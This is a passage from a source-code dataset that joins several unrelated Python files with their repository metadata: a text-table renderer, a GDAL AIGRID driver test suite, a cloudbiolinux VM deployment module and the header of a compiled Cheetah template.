return '%.*e' % (n, f)
else:
return '%.*f' % (n, f)
def _check_row_size(self, array):
"""Check that the specified array fits the previous rows size
"""
if not self._row_size:
self._row_size = len(array)
elif self._row_size != len(array):
raise ArraySizeError, "array should contain %d elements" \
% self._row_size
def _has_vlines(self):
"""Return a boolean, if vlines are required or not
"""
return self._deco & TextTable.VLINES > 0
def _has_hlines(self):
"""Return a boolean, if hlines are required or not
"""
return self._deco & TextTable.HLINES > 0
def _has_border(self):
"""Return a boolean, if border is required or not
"""
return self._deco & TextTable.BORDER > 0
def _has_header(self):
"""Return a boolean, if header line is required or not
"""
return self._deco & TextTable.HEADER > 0
def _hline_header(self):
"""Print header's horizontal line
"""
return self._build_hline(True)
def _hline(self):
"""Print an horizontal line
"""
if not self._hline_string:
self._hline_string = self._build_hline()
return self._hline_string
def _build_hline(self, is_header=False):
"""Return a string used to separated rows or separate header from
rows
"""
horiz = self._char_horiz
if (is_header):
horiz = self._char_header
# compute cell separator
s = "%s%s%s" % (horiz, [horiz, self._char_corner][self._has_vlines()],
horiz)
# build the line
l = string.join([horiz * n for n in self._width], s)
# add border if needed
if self._has_border():
l = "%s%s%s%s%s\n" % (self._char_corner, horiz, l, horiz,
self._char_corner)
else:
l += "\n"
return l
def _len_cell(self, cell):
"""Return the width of the cell
Special characters are taken into account to return the width of the
cell, such like newlines and tabs
"""
cell_lines = cell.split('\n')
maxi = 0
for line in cell_lines:
length = 0
parts = line.split('\t')
for part, i in zip(parts, range(1, len(parts) + 1)):
length = length + len(part)
if i < len(parts):
length = (length/8 + 1) * 8
maxi = max(maxi, length)
return maxi
def _compute_cols_width(self):
"""Return an array with the width of each column
If a specific width has been specified, exit. If the total of the
columns width exceed the table desired width, another width will be
computed to fit, and cells will be wrapped.
"""
if hasattr(self, "_width"):
return
maxi = []
if self._header:
maxi = [ self._len_cell(x) for x in self._header ]
for row in self._rows:
for cell,i in zip(row, range(len(row))):
try:
maxi[i] = max(maxi[i], self._len_cell(cell))
except (TypeError, IndexError):
maxi.append(self._len_cell(cell))
items = len(maxi)
length = reduce(lambda x,y: x+y, maxi)
if self._max_width and length + items * 3 + 1 > self._max_width:
maxi = [(self._max_width - items * 3 -1) / items \
for n in range(items)]
self._width = maxi
def _check_align(self):
"""Check if alignment has been specified, set default one if not
"""
if not hasattr(self, "_align"):
self._align = ["l"] * self._row_size
if not hasattr(self, "_valign"):
self._valign = ["t"] * self._row_size
def _draw_line(self, line, isheader=False):
"""Draw a line
Loop over a single cell length, over all the cells
"""
line = self._splitit(line, isheader)
space = " "
out = ""
for i in range(len(line[0])):
if self._has_border():
out += "%s " % self._char_vert
length = 0
for cell, width, align in zip(line, self._width, self._align):
length += 1
cell_line = cell[i]
fill = width - len(cell_line)
if isheader:
align = "c"
if align == "r":
out += "%s " % (fill * space + cell_line)
elif align == "c":
out += "%s " % (fill/2 * space + cell_line \
+ (fill/2 + fill%2) * space)
else:
out += "%s " % (cell_line + fill * space)
if length < len(line):
out += "%s " % [space, self._char_vert][self._has_vlines()]
out += "%s\n" % ['', self._char_vert][self._has_border()]
return out
    def _splitit(self, line, isheader):
        """Split each element of line to fit the column width
        Each element is turned into a list, result of the wrapping of the
        string to the desired width
        """
        line_wrapped = []
        for cell, width in zip(line, self._width):
            array = []
            for c in cell.split('\n'):
                # Python 2: decode to unicode so textwrap counts characters,
                # not bytes; fall back to replacement chars on bad input.
                try:
                    c = unicode(c, 'utf')
                except UnicodeDecodeError as strerror:
                    sys.stderr.write("UnicodeDecodeError exception for string '%s': %s\n" % (c, strerror))
                    c = unicode(c, 'utf', 'replace')
                array.extend(textwrap.wrap(c, width))
            line_wrapped.append(array)
        # Tallest wrapped cell determines the row height for this line.
        max_cell_lines = reduce(max, map(len, line_wrapped))
        for cell, valign in zip(line_wrapped, self._valign):
            if isheader:
                valign = "t"
            if valign == "m":
                # Middle: pad above and below (extra blank goes below).
                missing = max_cell_lines - len(cell)
                cell[:0] = [""] * (missing / 2)
                cell.extend([""] * (missing / 2 + missing % 2))
            elif valign == "b":
                # Bottom: pad above only.
                cell[:0] = [""] * (max_cell_lines - len(cell))
            else:
                # Top (default): pad below only.
                cell.extend([""] * (max_cell_lines - len(cell)))
        return line_wrapped
# Demo / smoke test: renders two example tables when run as a script
# (Python 2 print-statement syntax).
if __name__ == '__main__':
    table = TextTable()
    table.set_cols_align(["l", "r", "c"])
    table.set_cols_valign(["t", "m", "b"])
    table.add_rows([ ["Name", "Age", "Nickname"],
                     ["Mr\nXavier\nHuon", 32, "Xav'"],
                     ["Mr\nBaptiste\nClement", 1, "Baby"] ])
    print table.draw() + "\n"
    table = TextTable()
    table.set_deco(TextTable.HEADER)
    table.set_cols_dtype(['t',  # text
                          'f',  # float (decimal)
                          'e',  # float (exponent)
                          'i',  # integer
                          'a']) # automatic
    table.set_cols_align(["l", "r", "r", "r", "l"])
    table.add_rows([["text",    "float", "exp", "int", "auto"],
                    ["abcd",    "67",    654,   89,    128.001],
                    ["efghijk", 67.5434, .654,  89.6,  12800000000000000000000.00023],
                    ["lmn",     5e-78,   5e-78, 89.4,  .000000000000128],
                    ["opqrstu", .023,    5e+78, 92.,   12800000000000000000000]])
    print table.draw()
|
cdeil/rootpy
|
rootpy/extern/tabulartext/texttable.py
|
Python
|
gpl-3.0
| 18,657
|
[
"Brian"
] |
9510950646d81cf2b7de18f3b82ca496e204070440fff53257a31637b6051a94
|
#!/usr/bin/env python
###############################################################################
# $Id: aigrid.py 33793 2016-03-26 13:02:07Z goatbar $
#
# Project: GDAL/OGR Test Suite
# Purpose: Test read/write functionality for AIGRID driver.
# Author: Swapnil Hajare <dreamil@gmail.com>
#
###############################################################################
# Copyright (c) 2006, Swapnil Hajare <dreamil@gmail.com>
# Copyright (c) 2009-2010, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import os
import sys
from osgeo import gdal
sys.path.append( '../pymod' )
import gdaltest
###############################################################################
# Read test of simple byte reference data.
def aigrid_1():
    """Open the simple byte reference grid and verify its checksum."""
    return gdaltest.GDALTest('AIG', 'abc3x1', 1, 3).testOpen()
###############################################################################
# Verify some auxiliary data.
def aigrid_2():
    """Verify geotransform, projection, nodata and data type of prj.adf."""
    ds = gdal.Open( 'data/abc3x1/prj.adf' )
    gt = ds.GetGeoTransform()
    # Expected 1x1 degree pixels anchored at (-0.5, 0.5).
    if gt[0] != -0.5 or gt[1] != 1.0 or gt[2] != 0.0 \
       or gt[3] != 0.5 or gt[4] != 0.0 or gt[5] != -1.0:
        gdaltest.post_reason( 'Aigrid geotransform wrong.' )
        return 'fail'
    prj = ds.GetProjection()
    if prj.find('PROJCS["UTM Zone 55, Southern Hemisphere",GEOGCS["GDA94",DATUM["Geocentric_Datum_of_Australia_1994"') == -1:
        gdaltest.post_reason( 'Projection does not match expected:\n%s' % prj )
        return 'fail'
    band1 = ds.GetRasterBand(1)
    if band1.GetNoDataValue() != 255:
        gdaltest.post_reason( 'Grid NODATA value wrong or missing.' )
        return 'fail'
    if band1.DataType != gdal.GDT_Byte:
        gdaltest.post_reason( 'Data type is not Byte!' )
        return 'fail'
    return 'success'
###############################################################################
# Verify the colormap, and nodata setting for test file.
def aigrid_3():
    """Verify colormap contents and nodata value of the test grid."""
    ds = gdal.Open('data/abc3x1')
    band = ds.GetRasterBand(1)
    cm = band.GetRasterColorTable()
    colormap_ok = (cm.GetCount() == 256
                   and cm.GetColorEntry(0) == (95, 113, 150, 255)
                   and cm.GetColorEntry(1) == (95, 57, 29, 255))
    if not colormap_ok:
        gdaltest.post_reason( 'Wrong colormap entries' )
        return 'fail'
    cm = None
    if band.GetNoDataValue() != 255.0:
        gdaltest.post_reason( 'Wrong nodata value.' )
        return 'fail'
    return 'success'
###############################################################################
# Read test of simple byte reference data with data directory name in all uppercase
def aigrid_4():
    """Open the uppercase-named copy of the byte reference grid."""
    return gdaltest.GDALTest('AIG', 'ABC3X1UC', 1, 3).testOpen()
###############################################################################
# Verify the colormap, and nodata setting for test file with names of coverage directory and all files in it in all uppercase. Additionally also test for case where clr file resides in parent directory of coverage.
def aigrid_5():
    """Verify colormap and nodata for the all-uppercase coverage directory.

    Also exercises the case where the .clr file lives in the parent
    directory of the coverage.
    """
    ds = gdal.Open( 'data/ABC3X1UC' )
    cm = ds.GetRasterBand(1).GetRasterColorTable()
    if cm.GetCount() != 256 \
       or cm.GetColorEntry(0) != (95, 113, 150, 255)\
       or cm.GetColorEntry(1) != (95, 57, 29, 255):
        gdaltest.post_reason( 'Wrong colormap entries' )
        return 'fail'
    cm = None
    if ds.GetRasterBand(1).GetNoDataValue() != 255.0:
        gdaltest.post_reason( 'Wrong nodata value.' )
        return 'fail'
    return 'success'
###############################################################################
# Test on real dataset downloaded from http://download.osgeo.org/gdal/data/aig/nzdem
def aigrid_online_1():
    """Download the nzdem sample dataset and validate its RAT and statistics.

    Returns 'skip' when the download fails, 'fail' on any mismatch,
    'success' otherwise.
    """
    list_files = [ 'info/arc.dir',
                   'info/arc0000.dat',
                   'info/arc0000.nit',
                   'info/arc0001.dat',
                   'info/arc0001.nit',
                   'info/arc0002.dat',
                   'info/arc0002.nit',
                   'info/arc0002r.001',
                   'nzdem500/dblbnd.adf',
                   'nzdem500/hdr.adf',
                   'nzdem500/log',
                   'nzdem500/sta.adf',
                   'nzdem500/vat.adf',
                   'nzdem500/w001001.adf',
                   'nzdem500/w001001x.adf' ]
    # Create the cache directory tree; it may already exist from a prior
    # run, so only directory-creation errors are silenced (was a bare
    # except that would also have hidden KeyboardInterrupt etc.).
    try:
        os.mkdir('tmp/cache/nzdem')
        os.mkdir('tmp/cache/nzdem/info')
        os.mkdir('tmp/cache/nzdem/nzdem500')
    except OSError:
        pass
    for filename in list_files:
        if not gdaltest.download_file('http://download.osgeo.org/gdal/data/aig/nzdem/' + filename , 'nzdem/' + filename):
            return 'skip'
    tst = gdaltest.GDALTest( 'AIG', 'tmp/cache/nzdem/nzdem500/hdr.adf', 1, 45334, filename_absolute = 1 )
    ret = tst.testOpen()
    if ret != 'success':
        return ret
    ds = gdal.Open('tmp/cache/nzdem/nzdem500/hdr.adf')
    # Old-generation Python bindings lack the RAT API entirely, which
    # surfaces as an AttributeError on the band object.
    try:
        rat = ds.GetRasterBand(1).GetDefaultRAT()
    except AttributeError:
        print('Skipping RAT checking... OG Python bindings have no RAT API')
        return 'success'
    if rat is None:
        gdaltest.post_reason( 'No RAT found' )
        return 'fail'
    if rat.GetRowCount() != 2642:
        gdaltest.post_reason( 'Wrong row count in RAT' )
        return 'fail'
    if rat.GetColumnCount() != 2:
        gdaltest.post_reason( 'Wrong column count in RAT' )
        return 'fail'
    if rat.GetNameOfCol(0) != 'VALUE':
        gdaltest.post_reason( 'Wrong name of col 0' )
        return 'fail'
    if rat.GetTypeOfCol(0) != gdal.GFT_Integer:
        gdaltest.post_reason( 'Wrong type of col 0' )
        return 'fail'
    if rat.GetUsageOfCol(0) != gdal.GFU_MinMax:
        gdaltest.post_reason( 'Wrong usage of col 0' )
        return 'fail'
    if rat.GetNameOfCol(1) != 'COUNT':
        gdaltest.post_reason( 'Wrong name of col 1' )
        return 'fail'
    if rat.GetTypeOfCol(1) != gdal.GFT_Integer:
        gdaltest.post_reason( 'Wrong type of col 1' )
        return 'fail'
    if rat.GetUsageOfCol(1) != gdal.GFU_PixelCount:
        gdaltest.post_reason( 'Wrong usage of col 1' )
        return 'fail'
    if rat.GetValueAsInt(2641, 0) != 3627:
        gdaltest.post_reason( 'Wrong value in RAT' )
        return 'fail'
    if ds.GetRasterBand(1).GetMinimum() != 0.0:
        gdaltest.post_reason( 'Wrong minimum' )
        return 'fail'
    if ds.GetRasterBand(1).GetMaximum() != 3627.0:
        gdaltest.post_reason( 'Wrong maximum' )
        return 'fail'
    return 'success'
###############################################################################
# Tests run in this order by the gdaltest harness.
gdaltest_list = [
    aigrid_1,
    aigrid_2,
    aigrid_3,
    aigrid_4,
    aigrid_5,
    aigrid_online_1 ]
# Standalone entry point: run the test list through the gdaltest runner.
if __name__ == '__main__':
    gdaltest.setup_run( 'aigrid' )
    gdaltest.run_tests( gdaltest_list )
    gdaltest.summarize()
|
nextgis-extra/tests
|
lib_gdal/gdrivers/aigrid.py
|
Python
|
gpl-2.0
| 7,898
|
[
"ADF"
] |
b2946291e5cea433b8a39b2856ce51d0d1fc4b850e3bd5a7c911fd67382333d9
|
#!/usr/bin/env python
import os
from tempfile import tempdir
from subprocess import call
from inspect import getargspec
from cloudbio.utils import _setup_logging, _configure_fabric_environment, _parse_fabricrc
from cloudbio.biodata.genomes import install_data, install_data_s3, install_data_rsync
from cloudbio.galaxy import _setup_galaxy_env_defaults
from cloudbio.galaxy.utils import _chown_galaxy
from cloudbio.galaxy.tools import _install_tools
from fabfile import _perform_install, _install_custom
from .util import eval_template
from .volume import attach_volumes, make_snapshots, detach_volumes
import cloudbio.deploy.plugins
from fabric.main import load_settings
from fabric.api import put, run, env, settings, sudo
# vm-launcher is an optional dependency; when it is missing these names
# are set to None and any code path needing them raises ImportError later.
try:
    from .vmlauncher.transfer import FileTransferManager
    from .vmlauncher import build_vm_launcher
except ImportError:
    build_vm_launcher = None
    FileTransferManager = None
# Defaults for the cloudbiolinux install; None lets the fabfile pick.
DEFAULT_CLOUDBIOLINUX_TARGET = None
DEFAULT_CLOUDBIOLINUX_FLAVOR = None
def deploy(options):
    """Top-level entry point: launch/configure a VM per the options dict.

    Handles the vm-less "list" and "destroy" actions locally, dispatches
    plugin "local_actions", then boots a VM for any remaining actions.
    """
    _setup_logging(env)
    actions = _expand_actions(options.get("actions"))
    if options["vm_provider"] == "novm":
        # "novm" targets a real (possibly remote) machine, no cloud API.
        vm_launcher = LocalVmLauncher(options)
    else:
        if not build_vm_launcher:
            raise ImportError("Require vmlauncher: https://github.com/jmchilton/vm-launcher")
        vm_launcher = build_vm_launcher(options)
    if _do_perform_action("list", actions):
        for node in vm_launcher.list():
            print "Active node with uuid %s <%s>" % (node.uuid, node)
    if _do_perform_action("destroy", actions):
        target_name = options["hostname"]
        for node in vm_launcher.list():
            node_name = node.name
            if node_name == target_name:
                vm_launcher.destroy(node)
    __invoke_plugin_actions(env, actions, "local_actions", [vm_launcher, options])
    # Do we have remaining actions requiring an vm?
    if len(actions) > 0:
        print 'Setting up virtual machine'
        vm_launcher.boot_and_connect()
        _setup_vm(options, vm_launcher, actions)
class LocalVmLauncher:
    """Provide a lightweight real machine, non-vm class for launching.

    Mirrors the vm-launcher interface used by deploy()/_setup_vm() so the
    "novm" provider can target localhost or a configured hostname.
    """
    def __init__(self, options):
        self.options = options
    def get_ip(self):
        # Fall back to localhost when no hostname was configured.
        specified_hostname = self.options.get("hostname", None)
        hostname = specified_hostname or "localhost"
        return hostname
    def get_key_file(self):
        # No SSH key management for a local/real machine.
        return None
    def boot_and_connect(self):
        pass
    def destroy(self, node=None):
        # Accept the optional node argument that deploy() passes when
        # tearing down cloud nodes (previously destroy(self) raised
        # TypeError there); a real machine has nothing to destroy.
        pass
    def get_user(self):
        return env.user
    def list(self):
        # A local machine has no enumerable cloud nodes.
        return []
def _setup_vm(options, vm_launcher, actions):
    """Configure a booted VM: cloudbiolinux setup, then requested actions.

    When destroy_on_complete is set the instance is destroyed even if an
    action fails (finally block).
    """
    destroy_on_complete = get_boolean_option(options, 'destroy_on_complete', False)
    try:
        ip = vm_launcher.get_ip()
        _setup_fabric(vm_launcher, ip, options)
        with settings(host_string=ip):
            _setup_cloudbiolinux(options)
            if 'attach_volumes' in actions:
                attach_volumes(vm_launcher, options)
            if 'max_lifetime' in options:
                # Schedule an unconditional shutdown as a cost safety net.
                seconds = options['max_lifetime']
                # Unclear why the sleep is needed, but seems to be otherwise
                # this doesn't work.
                run("bash -c 'nohup sudo shutdown -h %d &'; sleep 2" % seconds)
            configure_instance(options, actions)
            if 'transfer' in actions:
                transfer_files(options)
            __invoke_plugin_actions(env, actions, "ready_actions", [vm_launcher, options])
            if 'ssh' in actions:
                _interactive_ssh(vm_launcher)
            if 'attach_ip' in actions:
                vm_launcher.attach_public_ip()
            if 'snapshot_volumes' in actions:
                make_snapshots(vm_launcher, options)
            if 'detach_volumes' in actions:
                detach_volumes(vm_launcher, options)
            if 'package' in actions:
                name_template = vm_launcher.package_image_name()
                name = eval_template(env, name_template)
                vm_launcher.package(name=name)
            if not destroy_on_complete and hasattr(vm_launcher, "uuid"):
                print 'Your instance (%s) is waiting at http://%s' % (vm_launcher.uuid, ip)
    finally:
        if destroy_on_complete:
            vm_launcher.destroy()
def _expand_actions(actions):
    """Normalize the requested action names into a set of simple actions.

    Known simple actions pass through; plugin-defined compound actions are
    expanded into their constituent parts. Unknown names are dropped.
    """
    unique_actions = set()
    for simple_action in _possible_actions():
        if simple_action in actions:
            unique_actions.add(simple_action)
    compound_actions = __get_plugin_actions(env, "compound_actions")
    for compound_action in compound_actions.keys():
        if compound_action in actions:
            for compound_action_part in compound_actions[compound_action]:
                unique_actions.add(compound_action_part)
    return unique_actions
def _possible_actions():
    """Return all action names the deployer understands.

    Combines the built-in actions with actions contributed by plugin
    modules via their local/configure/ready action hook dictionaries.
    """
    possible_actions = [ "list",
                         "destroy",
                         "transfer",
                         "purge_tools",
                         "setup_tools",
                         "setup_biodata",
                         "setup_ssh_key",
                         "package",
                         "setup_image",
                         "launch",  # Dummy action justs launches image
                         "install_biolinux",
                         "install_custom",
                         "ssh",
                         "attach_ip",
                         "snapshot_volumes",
                         "attach_volumes",
                         "detach_volumes",
                         ]
    # Fixed typo: the plugin attribute is "ready_actions" (as consumed by
    # __invoke_plugin_actions in _setup_vm); the old singular form meant
    # plugin ready actions were never reported as possible and were
    # therefore filtered out by _expand_actions.
    for action_type in ["local_actions", "configure_actions", "ready_actions"]:
        for action in __get_plugin_actions(env, action_type):
            possible_actions.append(action)
    return possible_actions
def _do_perform_action(action, action_list):
    """Return True and remove ``action`` from ``action_list`` when present.

    Mutates ``action_list`` in place so each action is consumed once.
    """
    if action not in action_list:
        return False
    action_list.remove(action)
    return True
def _setup_fabric(vm_launcher, ip, options):
    """Point the global fabric env at the freshly booted instance."""
    env.user = vm_launcher.get_user()
    env.hosts = [ip]
    env.key_filename = vm_launcher.get_key_file()
    # Cloud instances present new host keys on every boot.
    env.disable_known_hosts = True
def _setup_cloudbiolinux(options):
    """Configure the cloudbiolinux fabric environment for this deploy."""
    # Deferred loader so fabricrc properties are read with these options.
    def fabricrc_loader(env):
        _setup_cloudbiolinux_fabric_properties(env, options)
    flavor = get_main_options_string(options, "flavor", DEFAULT_CLOUDBIOLINUX_FLAVOR)
    # Distribution check only matters when sudo will actually be used.
    need_distcheck = options.get("fabricrc_overrides", {}).get("use_sudo")
    _configure_fabric_environment(env, flavor, fabricrc_loader=fabricrc_loader,
                                  ignore_distcheck=not need_distcheck)
    _setup_image_user_data(env, options)
def _setup_cloudbiolinux_fabric_properties(env, options):
    """Load fabricrc settings plus per-deploy overrides into ``env``."""
    fabricrc_file = get_main_options_string(options, "fabricrc_file", None)
    env.config_dir = os.path.join(os.path.dirname(__file__), "..", "..", "config")
    env.tool_data_table_conf_file = os.path.join(env.config_dir, "..",
                                                 "installed_files",
                                                 "tool_data_table_conf.xml")
    if fabricrc_file:
        env.update(load_settings(fabricrc_file))
    else:
        # Let cloudbiolinux find out default file based on flavor, dist, etc...
        _parse_fabricrc(env)
    overrides = options.get("fabricrc_overrides", {})
    for key, value in overrides.iteritems():
        # yaml parses bools, wouldn't be expected coming out of a fabricrc
        # file so replace everything with a string.
        if isinstance(value, bool):
            overrides[key] = str(value)
    env.update(overrides)
    _setup_galaxy_env_defaults(env)
def _setup_image_user_data(env, options):
    """Expose configured image user data to the rest of the deploy."""
    key = "image_user_data"
    if key in options:
        env["image_user_data_dict"] = options[key]
def purge_genomes():
    """Remove all installed genome data files from the instance."""
    sudo("rm -rf %s" % env.data_files)
def configure_ssh_key(options):
    """Install an SSH key for the galaxy user when one is configured.

    Creates ~galaxy/.ssh (0700), uploads the key and hands ownership of
    the directory to the galaxy user.
    """
    if "galaxy_ssh_key" in options:
        key_file = options["galaxy_ssh_key"]
        sudo("mkdir -p /home/%s/.ssh" % (env.galaxy_user))
        sudo("chmod 700 /home/%s/.ssh" % (env.galaxy_user))
        put(local_path=key_file,
            remote_path="/home/%s/.ssh/%s" % (env.galaxy_user, os.path.basename(key_file)),
            use_sudo=True,
            mode=0600)
        _chown_galaxy(env, "/home/%s/.ssh" % env.galaxy_user)
def setup_biodata(options):
    """Install reference genome data using the configured source.

    ``genome_source`` selects the installer: "default" (tries ggd, s3,
    then raw downloads), "S3", or "rsync". An unknown source raises
    KeyError, matching the original lookup behavior.
    """
    genome_source = options.get("genome_source", "default")
    # Removed a dead `install_proc = install_data` assignment that was
    # immediately overwritten by this lookup.
    install_proc = {
        "default": install_data,
        "S3": install_data_s3,
        "rsync": install_data_rsync,
    }[genome_source]
    if genome_source == "default":
        install_proc(options["genomes"], ["ggd", "s3", "raw"])
    else:
        install_proc(options["genomes"])
def configure_instance(options, actions):
    """Run the configuration-phase actions on the instance, in order.

    Built-in actions run around the plugin "configure_actions" hook so
    plugins see a biolinux-installed machine but can prepare tool setup.
    """
    if "install_biolinux" in actions:
        install_biolinux(options)
    if "install_custom" in actions:
        install_custom(options)
    if "purge_tools" in actions:
        purge_tools()
    __invoke_plugin_actions(env, actions, "configure_actions", [options])
    if "setup_tools" in actions:
        install_tools(options["tools"])
    if "setup_biodata" in actions:
        setup_biodata(options)
    if "setup_ssh_key" in actions:
        configure_ssh_key(options)
def install_custom(options):
    """Install the single custom package named in the options."""
    _install_custom(options.get("package"))
def install_biolinux(options):
    """Run a full cloudbiolinux install for the configured flavor/target."""
    _perform_install(
        target=options.get("target", DEFAULT_CLOUDBIOLINUX_TARGET),
        flavor=options.get("flavor", DEFAULT_CLOUDBIOLINUX_FLAVOR),
        more_custom_add=options.get("custom_add", None))
def _interactive_ssh(vm_launcher):
    """ Launch an interactive SSH session to host described by vm_launcher object.
    """
    host = vm_launcher.get_ip()
    user = vm_launcher.get_user()
    key_file = vm_launcher.get_key_file()
    # Host key checking is disabled because cloud instances present fresh
    # keys on every boot.
    # NOTE(review): the command is built by string interpolation and run
    # with shell=True; values come from deploy configuration, but quoting
    # would break if they ever contain single quotes.
    cmd = "ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i '%s' -l '%s' '%s'" % (key_file, user, host)
    call(cmd, shell=True)
def transfer_files(options):
    """Upload the configured files to the instance as the galaxy user."""
    transfer_options = _build_transfer_options(options, "/mnt/uploaded_data", "galaxy")
    plain_files = options.get("files", [])
    compressed = options.get("compressed_files", [])
    _do_transfer(transfer_options, plain_files, compressed)
def _build_transfer_options(options, destination, user):
    """Assemble the keyword arguments for FileTransferManager.

    ``destination`` is the remote directory, ``user`` the remote account
    the files are transferred as.
    """
    transfer_options = {}
    transfer_options['compress'] = get_boolean_option(options, 'compress_transfers', True)
    transfer_options['num_compress_threads'] = int(get_main_options_string(options, 'num_compress_threads', '1'))
    transfer_options['num_transfer_threads'] = int(get_main_options_string(options, 'num_transfer_threads', '1'))
    transfer_options['num_decompress_threads'] = int(get_main_options_string(options, 'num_decompress_threads', '1'))
    # chunk_size 0 means "do not chunk".
    transfer_options['chunk_size'] = int(get_main_options_string(options, 'transfer_chunk_size', '0'))
    transfer_options['transfer_retries'] = int(get_main_options_string(options, 'transfer_retries', '3'))
    # NOTE(review): `tempdir` here is tempfile.tempdir, which is normally
    # None unless something set it — presumably FileTransferManager then
    # picks its own default; confirm the intent wasn't tempfile.gettempdir().
    transfer_options['local_temp'] = get_main_options_string(options, 'local_temp_dir', tempdir)
    transfer_options['destination'] = destination
    transfer_options['transfer_as'] = user
    return transfer_options
def _do_transfer(transfer_options, files, compressed_files=None):
    """Transfer plain and pre-compressed files via FileTransferManager.

    Raises ImportError when the optional vm-launcher dependency is not
    installed. ``compressed_files`` defaults to an empty list (replacing
    the mutable-default-argument anti-pattern; passing a list or None is
    backward compatible).
    """
    if compressed_files is None:
        compressed_files = []
    if not FileTransferManager:
        raise ImportError("Require vmlauncher: https://github.com/jmchilton/vm-launcher")
    FileTransferManager(**transfer_options).transfer_files(files, compressed_files)
def purge_tools():
    """Delete the tool installation directory on the instance."""
    env.safe_sudo("rm -rf %s" % env.install_dir)
def install_tools(tools_conf):
    """Install the Galaxy tools described by ``tools_conf`` on the instance."""
    _install_tools(env, tools_conf)
def get_boolean_option(options, name, default=False):
    """Return ``options[name]`` when present, otherwise ``default``."""
    return options.get(name, default)
def get_main_options_string(options, key, default=''):
    """Return ``options[key]`` when present, otherwise ``default``."""
    return options.get(key, default)
def __invoke_plugin_actions(env, actions, action_type, provided_args):
    """Run any requested actions supplied by plugins of ``action_type``.

    Matching actions are consumed (removed from ``actions``) so the caller
    can tell whether unhandled actions remain.
    """
    possible_actions = __get_plugin_actions(env, action_type)
    # Iterate a copy because matched actions are removed from the set.
    for action in list(actions):
        if action in possible_actions:
            __invoke_plugin_action(env, possible_actions[action], provided_args)
            actions.remove(action)
def __invoke_plugin_action(env, action_function, provided_args):
    """Call a plugin action, passing args only if its signature takes any.

    NOTE(review): inspect.getargspec is legacy (removed in Python 3.11);
    fine for this Python 2 codebase.
    """
    arg_spec = getargspec(action_function).args
    args = [] if not arg_spec else provided_args
    action_function(*args)
def __get_plugin_actions(env, action_type):
    """Collect the ``action_type`` dict (name -> callable) from all plugins.

    Later plugin modules overwrite earlier entries with the same name,
    enabling hierarchical overrides (see __get_plugin_modules ordering).
    """
    actions = {}
    for plugin_module in __get_plugin_modules(env):
        if hasattr(plugin_module, action_type):
            for action_name, action_function in getattr(plugin_module, action_type).iteritems():
                actions[action_name] = action_function
    return actions
def __get_plugin_modules(env):
    """Import and cache all plugin modules, skipping ones that fail to load.

    The imported module list is cached on ``env`` so discovery runs once.
    """
    if not "plugin_modules" in env:
        unsorted_module_names = __get_plugin_module_names( )
        ## Load modules in reverse order to allow hierarchical overrides
        module_names = sorted(unsorted_module_names, reverse=True)
        modules = []
        for plugin_module_name in module_names:
            try:
                module = __import__(plugin_module_name)
                # __import__ returns the top-level package; walk down to
                # the actual plugin submodule.
                for comp in plugin_module_name.split(".")[1:]:
                    module = getattr(module, comp)
                modules.append(module)
            except BaseException, exception:
                # A broken plugin is logged and skipped, never fatal.
                exception_str = str(exception)
                message = "%s rule module could not be loaded: %s" % (plugin_module_name, exception_str)
                env.logger.warn(message)
                continue
        env.plugin_modules = modules
    return env.plugin_modules
def __get_plugin_module_names():
    """Discover importable plugin module names under cloudbio.deploy.plugins.

    Files starting with an underscore (e.g. __init__.py) are skipped.
    """
    plugin_dir = cloudbio.deploy.plugins.__path__[0]
    suffix = ".py"
    return ["cloudbio.deploy.plugins.%s" % fname[:-len(suffix)]
            for fname in os.listdir(plugin_dir)
            if not fname.startswith("_") and fname.endswith(suffix)]
|
elkingtonmcb/cloudbiolinux
|
cloudbio/deploy/__init__.py
|
Python
|
mit
| 13,998
|
[
"Galaxy"
] |
ee5d588c933a02d508f0d7c9e7f4a3d3b9133e12fe69aaf6a3689730fa1f0132
|
#!/usr/bin/env python
##################################################
## DEPENDENCIES
import sys
import os
import os.path
try:
import builtins as builtin
except ImportError:
import __builtin__ as builtin
from os.path import getmtime, exists
import time
import types
from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion
from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple
from Cheetah.Template import Template
from Cheetah.DummyTransaction import *
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
from Cheetah.CacheRegion import CacheRegion
import Cheetah.Filters as Filters
import Cheetah.ErrorCatchers as ErrorCatchers
##################################################
## MODULE CONSTANTS
# Short aliases for Cheetah's name-resolution helpers used in respond().
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
# Generation metadata recorded by the Cheetah compiler.
__CHEETAH_version__ = '2.4.4'
__CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0)
__CHEETAH_genTime__ = 1406885498.511507
__CHEETAH_genTimestamp__ = 'Fri Aug  1 18:31:38 2014'
__CHEETAH_src__ = '/home/wslee2/models/5-wo/force1plus/openpli3.0/build-force1plus/tmp/work/mips32el-oe-linux/enigma2-plugin-extensions-openwebif-1+git5+3c0c4fbdb28d7153bf2140459b553b3d5cdd4149-r0/git/plugin/controllers/views/web/sleeptimer.tmpl'
__CHEETAH_srcLastModified__ = 'Fri Aug  1 18:30:05 2014'
__CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine'
# Refuse to run templates compiled by an incompatible older Cheetah.
if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
